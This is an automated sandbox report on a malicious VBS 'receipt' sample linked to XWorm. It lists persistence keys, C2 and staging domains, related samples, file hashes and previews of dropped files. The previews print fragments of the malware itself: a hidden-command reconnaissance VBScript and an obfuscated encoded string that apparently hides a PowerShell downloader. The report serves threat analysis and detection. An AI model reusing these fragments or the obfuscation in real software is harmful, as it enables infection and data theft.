Start date and time:	2024-05-04 09:49:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	E7236252-receipt.vbs
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winVBS@30/38@11/11
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 58% Number of executed functions: 23 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 192.229.211.108, 142.250.72.131, 142.251.2.84, 142.251.40.46, 34.104.35.123, 142.250.189.3, 72.247.96.147, 142.251.40.35, 172.217.12.142
Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:50:10	API Interceptor	1x Sleep call for process: wscript.exe modified
09:50:20	API Interceptor	2x Sleep call for process: svchost.exe modified
09:50:34	API Interceptor	59x Sleep call for process: powershell.exe modified
09:50:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\moquenqueiro.vbs
09:50:54	API Interceptor	70x Sleep call for process: RegSvcs.exe modified
09:50:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\moquenqueiro.vbs
09:51:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.3.235	2024 12_59_31 a.m..js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
104.20.3.235	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
104.21.45.138	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse
	QF3YL9rOxB.rtf	Get hash	malicious	AgentTesla	Browse
	cotizaci#U00f3n_04302024.xla.xlsx	Get hash	malicious	AgentTesla	Browse
	Demand Q2-2024.xlsx	Get hash	malicious	Unknown	Browse
	dgYOTTzRDQ.rtf	Get hash	malicious	AgentTesla	Browse
	Factura.PDF______________________________________.vbs	Get hash	malicious	StormKitty, XWorm	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.img	Get hash	malicious	XWorm	Browse
	Shipment Receipts20240425.vbs	Get hash	malicious	Unknown	Browse
239.255.255.250	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse
	Pedido-Faturado-398731.msi	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Dropper-CHS.435.30054.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.W32.A-62389890.Eldorado.13265.15378.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.W32.Tfr.F.tr.27075.5245.exe	Get hash	malicious	Unknown	Browse
	SW3uxM7BXI.exe	Get hash	malicious	RedLine	Browse
	1CMweaqlKp.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	https://securepdffilesaccess%E3%80%82com/docx/#9403ZGF2ZW1AY3BlcXVpdHkuY29t??nEJx==78463=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d#&vg=008d8185-7421-4d39-a8ea-d6571496b99e&stid=14&pti=1&pa=20041&pos=0&p=525094&channelId=21280b5d95ea9121&s=lsfbx0rnvkkgxzgo1sbi4b3z&sgs=2004:15-17+F-150	Get hash	malicious	HTMLPhisher	Browse
	https://lestore.lenovo.com/detail/L109130	Get hash	malicious	Unknown	Browse
	https://baoku.360.cn/d/2000006826_9510044	Get hash	malicious	Unknown	Browse
12.221.146.138	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse
	171445824977c976fac5440dadfae67b1829817677698fe84127a065ee0d81bdba97dc885f639.dat-decoded.exe	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.img	Get hash	malicious	XWorm	Browse
	F723838674.vbs	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xwormay8450.duckdns.org	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	12.221.146.138
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	12.221.146.138
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	12.221.146.138
pastebin.com	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.19.24
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	104.20.3.235
	ent.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	BTUJ5A5J3m.exe	Get hash	malicious	LimeRAT	Browse	172.67.19.24
	invoice.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse	104.20.4.235
	2024 12_59_31 a.m..js	Get hash	malicious	WSHRAT	Browse	104.20.3.235
	Dadebehring PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	172.67.19.24
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	104.20.3.235
	Update on Payment.js	Get hash	malicious	WSHRAT	Browse	104.20.4.235
	G1lnGpOLK4.exe	Get hash	malicious	Njrat	Browse	104.20.3.235
uploaddeimagens.com.br	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	youhaveonefilefortody.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	getinher.doc	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	172.67.215.45
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.139.174
	1CMweaqlKp.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.19.24
	SecuriteInfo.com.PossibleThreat.PALLASNET.H.14592.12237.dll	Get hash	malicious	Unknown	Browse	172.67.129.98
	https://securepdffilesaccess%E3%80%82com/docx/#9403ZGF2ZW1AY3BlcXVpdHkuY29t??nEJx==78463=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d#&vg=008d8185-7421-4d39-a8ea-d6571496b99e&stid=14&pti=1&pa=20041&pos=0&p=525094&channelId=21280b5d95ea9121&s=lsfbx0rnvkkgxzgo1sbi4b3z&sgs=2004:15-17+F-150	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://baoku.360.cn/d/2000006826_9510044	Get hash	malicious	Unknown	Browse	1.1.1.1
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.200.96
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	104.21.13.139
ATT-INTERNET4US	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	12.221.146.138
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	12.221.146.138
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	12.221.146.138
	sora.arm-20240504-0115.elf	Get hash	malicious	Mirai	Browse	108.218.226.97
	sora.x86-20240504-0115.elf	Get hash	malicious	Mirai	Browse	107.67.131.199
	https://monacolife.net	Get hash	malicious	Unknown	Browse	13.36.27.25
	x86.elf	Get hash	malicious	Unknown	Browse	32.45.187.39
	2AAH1UYstb.elf	Get hash	malicious	Mirai	Browse	99.160.220.147
	9d565bee-e6ce-1842-e729-b0df8f08ed34.eml	Get hash	malicious	HTMLPhisher	Browse	172.183.192.109
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	13.36.222.91
CLOUDFLARENETUS	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.139.174
	1CMweaqlKp.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.19.24
	SecuriteInfo.com.PossibleThreat.PALLASNET.H.14592.12237.dll	Get hash	malicious	Unknown	Browse	172.67.129.98
	https://securepdffilesaccess%E3%80%82com/docx/#9403ZGF2ZW1AY3BlcXVpdHkuY29t??nEJx==78463=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d#&vg=008d8185-7421-4d39-a8ea-d6571496b99e&stid=14&pti=1&pa=20041&pos=0&p=525094&channelId=21280b5d95ea9121&s=lsfbx0rnvkkgxzgo1sbi4b3z&sgs=2004:15-17+F-150	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://baoku.360.cn/d/2000006826_9510044	Get hash	malicious	Unknown	Browse	1.1.1.1
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.200.96
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	104.21.13.139
SS-ASHUS	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	131.153.147.50
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	131.153.147.50
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	131.153.147.50
	https://mandrillapp.com/track/click/30551860/topbusiness.ro?p=eyJzIjoiWmkwVnFVYXdRYlFmYnVnd3Y3OWdtR2h1anpvIiwidiI6MSwicCI6IntcInVcIjozMDU1MTg2MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3RvcGJ1c2luZXNzLnJvXFxcL3dwLWFkbWluXFxcL2pzXFxcL3dpZGdldHNcXFwvbWVkaWFcXFwvP2FjdGlvbj12aWV3JjE0MD1jMk52ZEhRdVpHRm9ibXRsUUd4allYUjBaWEowYjI0dVkyOXQmcjE9MTQwJnIyPTE0MCZub2lzZT00Q0hBUlwiLFwiaWRcIjpcImVjMTY1MjE1OWRhYTRjZTA5ZGZhODE5NTEzNzU2Mjg1XCIsXCJ1cmxfaWRzXCI6W1wiOGMyZTc5NjYyNTU5N2FjNDFlODZkYmM4MWMwMjI2MTFjZjYyYTIzMlwiXX0ifQ	Get hash	malicious	HTMLPhisher	Browse	131.153.170.221
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	131.153.151.114
	http://loveevamk.life	Get hash	malicious	Unknown	Browse	131.153.131.121
	https://bs-2pp.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	198.24.163.92
	https://infobanknews.com/bank-btpn-tuntaskan-akuisisi-oto-group-senilai-rp655-triliun/	Get hash	malicious	Unknown	Browse	198.24.167.172
	http://midjourney.co	Get hash	malicious	Unknown	Browse	131.153.171.234
	http://zarabidarix.xyz/4kKUDf2271ibnX494fplpivknze26JVIISAKNWCQFBYE13955JAYA338314o10	Get hash	malicious	Unknown	Browse	131.153.151.100

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	20.12.23.50
	Pedido-Faturado-398731.msi	Get hash	malicious	Unknown	Browse	20.12.23.50
	SecuriteInfo.com.Win32.Dropper-CHS.435.30054.exe	Get hash	malicious	Unknown	Browse	20.12.23.50
	SecuriteInfo.com.W32.A-62389890.Eldorado.13265.15378.exe	Get hash	malicious	Unknown	Browse	20.12.23.50
	SecuriteInfo.com.W32.Tfr.F.tr.27075.5245.exe	Get hash	malicious	Unknown	Browse	20.12.23.50
	SW3uxM7BXI.exe	Get hash	malicious	RedLine	Browse	20.12.23.50
	https://securepdffilesaccess%E3%80%82com/docx/#9403ZGF2ZW1AY3BlcXVpdHkuY29t??nEJx==78463=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d#&vg=008d8185-7421-4d39-a8ea-d6571496b99e&stid=14&pti=1&pa=20041&pos=0&p=525094&channelId=21280b5d95ea9121&s=lsfbx0rnvkkgxzgo1sbi4b3z&sgs=2004:15-17+F-150	Get hash	malicious	HTMLPhisher	Browse	20.12.23.50
	https://lestore.lenovo.com/detail/L109130	Get hash	malicious	Unknown	Browse	20.12.23.50
	SecuriteInfo.com.Trojan.Siggen28.41706.73.21156.exe	Get hash	malicious	Unknown	Browse	20.12.23.50
	https://www.bjvpza.cn/	Get hash	malicious	Unknown	Browse	20.12.23.50
3b5074b1b5d032e5620f69f9f700ff0e	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	131.153.147.50 104.21.45.138
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	131.153.147.50 104.21.45.138
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	131.153.147.50 104.21.45.138
	LFfjUMuUFU.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm	Browse	131.153.147.50 104.21.45.138
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	131.153.147.50 104.21.45.138
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	131.153.147.50 104.21.45.138
	nXaujG6G1F.exe	Get hash	malicious	Blank Grabber, DCRat, Umbral Stealer	Browse	131.153.147.50 104.21.45.138
	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse	131.153.147.50 104.21.45.138
	http://pixelread.com	Get hash	malicious	Unknown	Browse	131.153.147.50 104.21.45.138
	https://url.us.m.mimecastprotect.com/s/rYQHCYEBgkHWJjw3h0H9oU?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	131.153.147.50 104.21.45.138
37f463bf4616ecd445d4a1937da06e19	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	104.20.3.235
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	104.20.3.235
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	104.20.3.235
	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	104.20.3.235
	SecuriteInfo.com.Trojan.Siggen22.5496.19647.10510.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	yvg1X8doal.dll	Get hash	malicious	Latrodectus	Browse	104.20.3.235
	6kAOUicqCK.dll	Get hash	malicious	Latrodectus	Browse	104.20.3.235
	GLKJoBXIVE.dll	Get hash	malicious	Latrodectus	Browse	104.20.3.235
	2024 9_45_44 p.m..js	Get hash	malicious	WSHRAT	Browse	104.20.3.235
	2024 9_45_44 p.m..js	Get hash	malicious	WSHRAT	Browse	104.20.3.235

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\RegSvcs.exe	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse
	Transfer copy PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	PO# CV-PO23002552.PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Deposit payment copy PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Approved E-DO PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	PO# CV-PO23002552.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Invoice Checklist.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	H223070141&H223070191.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	overdue Balance.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.37374351035216996
Encrypted:	false
SSDEEP:	1536:LJdk0Giody0GJ0GNzJLjK7aJLgJLatZiPKIeRAkr/ncx52yeoXtT3N5elfbcg8Sm:LJ3QRJI9rQ
MD5:	A8D259A5A2DDA5CA148957B38B15005B
SHA1:	B92FDA49CE6DF414515557D6471E17C520C253B5
SHA-256:	35C76186AA6795FEF782A0ADE86ECCC9894A31BF66B1BE4EC440AF0889D53269
SHA-512:	20A620C9435E77752D1B01BF60298AA488E9DF9B22648F88EC729545835077D2A570F123B9F8B4719897A0BE9A2FA4BCA51974FFE40F7A0465A89DB41BF43D1A
Malicious:	false
Preview:	lS..........@..@.....{/..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..................................."&.%*Z.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x69475a28, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6049542359908212
Encrypted:	false
SSDEEP:	1536:DSB2ESB2SSjlK/Cv0hXk0GkzJLfXk0GtYkr3g16n2UPkLk+kIp4mymxmEJEMhyFR:DazaMv27RA2UU5z
MD5:	290CF829BD3893621ED4CC009DE4538E
SHA1:	0B05A764C22C45AB8255047281C0B9F9FFC81A99
SHA-256:	B9CDF31728BF9870C7E6EF5FA9CF69D282FD6AAEB627AC9B96741EC07CAD20C8
SHA-512:	89932844D44514CA2AA48741A5C695F0DA60E39B36AABF072E1671EB55370F769C9179837DC47B6E5E49A0A3F349E31777A52E283F3F94E2D552E831CE3FBFAD
Malicious:	false
Preview:	iGZ(... .......W.......X\...;...{......................H.6.....2....{...2...\|U.h.8.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{/..............................................................................................................................................................................................2...{.......................................2...\|.{.................{,..2...\|U..........................#......h.8.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07843895989899158
Encrypted:	false
SSDEEP:	3:tSXKYeG1wPm/plLsrCll7hB9//all9fl+/rSIn0/:tSXKzveDLs+ll7hBoXk3
MD5:	6E8B85D80D3B372A30BFE0AA07110837
SHA1:	F04B6FBB628E11ABD1D62E91A452C0DF121958CE
SHA-256:	D32E26F3B5430F0B733F2183F554220E02460273005EB109B95BE98511F5DA67
SHA-512:	71D3437354E61FF367F02EF87FE09E3B75023DC474667E2A6F794FF7050398B2C895AD5337BE282E9CE0FC763A3FED5EC6B98AF6BF9273856D804C61E7D975BE
Malicious:	false
Preview:	2{.M.....................................;...{...2...\|U.2....{..........2....{..2....{..{..]2....{.:.................{,..2...\|U.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\moquenqueiro.vbs

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	437480
Entropy (8bit):	5.105403560005336
Encrypted:	false
SSDEEP:	6144:sVNFUxUwlTY4h4QmIICQ791+yhii4591lF1UflGsZcfb:nINyeOirlc
MD5:	42320E659E8E1885EB96342E52E4EC60
SHA1:	8FF7099935C8375DDC21E19D61FE13AE56BEA2F0
SHA-256:	5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9
SHA-512:	CC35BB7E273C59C39C25FB902E12379A368FAE97C8403C7DF669DB215E57BDB805D649FAA7DB084E13ADE1F4AA3D97F3457E667770EF2F5D489AD9AED214A707
Malicious:	true
Preview:	Dim FSO, shell, xslProcessor....Sub RunCmd(CommandString, OutputFile).. cmd = "cmd /c " + CommandString + " >> " + OutputFile.. shell.Run cmd, 0, True..End Sub....Sub GetOSInfo(outputFileName).. On Error Resume Next.. strComputer = ".".. HKEY_LOCAL_MACHINE = &H80000002.... Dim objReg, outputFile.. Dim buildDetailNames, buildDetailRegValNames.... buildDetailNames = Array("Product Name", "Version", "Build Lab", "Type").. buildDetailRegValNames = Array("ProductName", "CurrentVersion", "BuildLabEx", "CurrentType").... Set outputFile = FSO.OpenTextFile(outputFileName, 2, True).... Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_.. strComputer & "\root\default:StdRegProv").... outputFile.WriteLine("[Architecture/Processor Information]").. outputFile.WriteLine().. outputFile.Close.. cmd = "cmd /c set processor >> " & outputFileName.. shell.Run cmd, 0, True.... Set outputFile = FSO.OpenTextFile(outpu

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2FMK3KK3\eCmZ7z04[1].txt

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11104), with CRLF line terminators
Category:	dropped
Size (bytes):	13189
Entropy (8bit):	4.684856047273705
Encrypted:	false
SSDEEP:	384:Ql4LlxV0Q7c78VjUsfwd+mMSGr6237bBeH+K2RcTVpPgRRVNZbc+A/O:BVJYIVjTwgPSGe237bBtpaVyPA+x
MD5:	81E2D469F583DFBC1C613A0B154B6FA2
SHA1:	FA62501B9CB93AE14CA64FB197B3C5A07D11DC27
SHA-256:	044550BF29CAE3EEDA3D686B1E276D3BEC168932A4A5B88954FA6FAD377EAB5E
SHA-512:	7FD7DC5DAB3B9808F103C3FB736655688816E919B53C35D767BC1121FF66F99D9C0C1C54782480BC3882E18299723E2F1B57DED95CE035F8C952DF363E4821C9
Malicious:	false
Preview:	.. dim inticante , poterantera , ambarvais , tiriva , agitato , Cama , agitato1.. poterantera = " ".. ambarvais = "" & tiriva & poterantera & tiriva & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & tiriva & poterantera & tiriva & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & tiriva & poterantera & tiriva & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & tiriva & poterantera & tiriva & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & tiriva & poterantera & tiriva & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & tiriva & poterantera & tiriva & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & tiriva & poterantera &

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.9243637703272345
Encrypted:	false
SSDEEP:	192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
MD5:	EF4099FCAB6D29945272316889156337
SHA1:	5AAFAD4581D21179B892604BEBD6038792F8CBD6
SHA-256:	A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
SHA-512:	EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
Malicious:	false
Preview:	PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	12272
Entropy (8bit):	5.4443165303454535
Encrypted:	false
SSDEEP:	192:3B+gj1GDjZo97Hn8WtGaag2syYREG1fusZate4NKFlFqte4NKFIFvdNhPC2OX89O:38gj1GP0D8kbagjiJuwXIXAeSI6vE2+N
MD5:	082C6315A58024BA23268E1B61B12F83
SHA1:	64DC0376AE9A4BBC7AE98B50969C41564104B95D
SHA-256:	B21537D067043D8BC95173FBA2CD570CEF24B6ED0E57BABEDC8E0792C1BBF0E1
SHA-512:	363CFF9AC12C4C3AFEBBCEFEB49ED5CA7E5D8F3C3DDBB67FF18B1ACCDB4545F7DEE6D12397D65F843E3F6D158A70BDFEB733EB26C47373455760EEBCA2D6F854
Malicious:	false
Preview:	@...e................................................@..........H...............o..b~.D.poM...!..... .Microsoft.PowerShell.ConsoleHostD...............E...y.BG.\......\|.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...f.......System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.............................................V.@..?@...@.X.@.J.@.Z.@.^.@.qT@.kT@..T@..S@.......@.].@.\.@...@...@...@...@...@...@.=.@.?.@...@...@.

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35
Entropy (8bit):	3.7071562309216133
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rn:EFYJKDoWrcn
MD5:	BFABEC865892A34F532FABF984F7E156
SHA1:	3C8292E49FEFD3DA96DBC289B36C4C710B0127E3
